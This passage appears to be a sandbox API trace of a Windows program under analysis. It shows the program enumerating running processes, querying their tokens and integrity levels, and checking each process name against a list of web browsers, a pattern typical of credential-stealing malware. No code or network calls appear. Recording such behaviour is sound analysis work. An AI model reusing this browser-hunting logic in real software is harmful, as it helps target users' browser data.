[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.270] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.270] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.270] GetLastError () returned 0x7a [0235.270] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.270] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.270] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.270] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0235.270] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0235.270] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0235.270] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0235.270] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0235.270] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0235.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0235.270] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.270] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.270] GetLastError () returned 0x7a [0235.270] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.270] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.270] CloseHandle (hObject=0xb8) returned 1 [0235.270] CloseHandle (hObject=0xb4) returned 1 [0235.271] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.271] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.271] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.271] GetLastError () returned 0x7a [0235.271] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.271] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.271] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.271] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.271] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0235.271] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.271] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.271] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.271] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0235.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0235.271] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.271] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.271] GetLastError () returned 0x7a [0235.271] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.271] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.271] CloseHandle (hObject=0xb8) returned 1 [0235.271] CloseHandle (hObject=0xb4) returned 1 [0235.271] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.271] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.271] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.271] GetLastError () returned 0x7a [0235.271] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.271] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.271] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.271] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.271] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0235.271] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.271] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.271] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.271] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0235.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0235.271] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.271] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.271] GetLastError () returned 0x7a [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.272] CloseHandle (hObject=0xb8) returned 1 [0235.272] CloseHandle (hObject=0xb4) returned 1 [0235.272] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.272] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.272] GetLastError () returned 0x7a [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.272] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.272] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.272] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.272] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.272] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.272] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.272] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.272] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0235.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0235.272] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.272] GetLastError () returned 0x7a [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.272] CloseHandle (hObject=0xb8) returned 1 [0235.272] CloseHandle (hObject=0xb4) returned 1 [0235.272] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.272] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.272] GetLastError () returned 0x7a [0235.272] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.272] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.272] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.272] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0235.272] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0235.272] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0235.272] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0235.272] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0235.272] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0235.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0235.273] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.273] GetLastError () returned 0x7a [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.273] CloseHandle (hObject=0xb8) returned 1 [0235.273] CloseHandle (hObject=0xb4) returned 1 [0235.273] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.273] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.273] GetLastError () returned 0x7a [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.273] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.273] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.273] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0235.273] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0235.273] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0235.273] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0235.273] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0235.273] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0235.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0235.273] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.273] GetLastError () returned 0x7a [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.273] CloseHandle (hObject=0xb8) returned 1 [0235.273] CloseHandle (hObject=0xb4) returned 1 [0235.273] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.273] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.273] GetLastError () returned 0x7a [0235.273] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.273] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.273] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.273] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0235.274] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0235.274] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0235.274] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0235.274] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0235.274] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0235.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0235.274] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.274] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.274] GetLastError () returned 0x7a [0235.274] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.274] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.274] CloseHandle (hObject=0xb8) returned 1 [0235.274] CloseHandle (hObject=0xb4) returned 1 [0235.274] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.274] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.274] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.274] GetLastError () returned 0x7a [0235.274] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.274] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.274] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.274] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0235.274] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0235.274] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0235.274] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0235.274] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0235.274] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0235.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0235.274] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.275] GetLastError () returned 0x7a [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.275] CloseHandle (hObject=0xb8) returned 1 [0235.275] CloseHandle (hObject=0xb4) returned 1 [0235.275] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.275] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.275] GetLastError () returned 0x7a [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.275] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.275] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.275] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.275] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0235.275] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.275] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.275] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.275] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0235.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0235.275] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.275] GetLastError () returned 0x7a [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.275] CloseHandle (hObject=0xb8) returned 1 